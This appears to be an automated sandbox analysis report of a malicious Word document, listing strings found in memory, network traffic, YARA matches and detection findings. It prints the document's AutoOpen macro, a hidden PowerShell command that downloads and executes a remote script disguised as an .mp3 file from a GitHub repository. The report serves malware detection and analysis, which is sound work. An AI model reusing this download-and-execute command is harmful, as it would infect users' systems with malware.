Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://login.windows.local
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://management.azure.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://management.azure.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://messaging.office.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000003.00000002.558226568.0000000006182000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://officeapps.live.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://onedrive.live.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://osi.office.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office365.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://powerlift-user.acompli.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/ssbb36/stv/main/2.mp3
Source: powershell.exe, 00000003.00000002.556805332.0000000005386000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3
Source: powershell.exe, 00000003.00000002.556805332.0000000005386000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com4
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://roaming.edog.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://settings.outlook.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://tasks.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown DNS traffic detected: queries for: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1 Host: github.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/2.mp3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/main/2.mp3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/3.mp3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/4.mp3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: github.com

System Summary:

Found detection on Joe Sandbox Cloud Basic with higher score
Source: RfORrHIRNe.doc Joe Sandbox Cloud Basic: Detection: malicious Score: 88 Perma Link
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\temp54685 Jump to dropped file
Document contains an embedded VBA macro with suspicious strings
Source: RfORrHIRNe.doc OLE, VBA macro line: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: VBA code instrumentation OLE, VBA macro: Module NewMacros, Function Autoopen, String powershell: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')") Name: Autoopen
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE, VBA macro line: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Yara signature match
Source: RfORrHIRNe.doc, type: SAMPLE Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: RfORrHIRNe.doc, type: SAMPLE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000003.00000002.552672954.00000000031B0000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000003.00000002.556594505.0000000005261000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 6268, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Temp\~DFF551811DB4F781F3.TMP, type: DROPPED Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Temp\~DFF551811DB4F781F3.TMP, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp, type: DROPPED Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\Documents\20211104\PowerShell_transcript.141700.Lg6KA_8X.20211104015721.txt, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Document has an unknown application name
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE indicator application name: unknown
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE indicator application name: unknown
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08178AC0 3_2_08178AC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08170006 3_2_08170006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08170040 3_2_08170040
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: RfORrHIRNe.doc OLE, VBA macro line: Sub Autoopen()
Source: VBA code instrumentation OLE, VBA macro: Module NewMacros, Function Autoopen Name: Autoopen
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE, VBA macro line: Sub Autoopen()
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Document contains no OLE stream with summary information
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE indicator has summary info: false
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE indicator has summary info: false
Document contains embedded VBA macros
Source: RfORrHIRNe.doc OLE indicator, VBA macros: true
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE indicator, VBA macros: true
Source: RfORrHIRNe.doc Virustotal: Detection: 49%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: RfORrHIRNe.doc OLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user~1\AppData\Local\Temp\{E0FFF13A-584C-4B0E-BE73-75AB44A943FB} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal96.expl.winDOC@4/35@3/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_01
Source: RfORrHIRNe.doc OLE document summary: title field not present or empty
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/styles.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
PE file contains sections with non-standard names
Source: temp54685.3.dr Static PE information: section name: _RDATA
PE file contains an invalid checksum
Source: temp54685.3.dr Static PE information: real checksum: 0x3c1ec38 should be:

Persistence and Installation Behavior:

Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\temp54685 Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\temp54685 Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
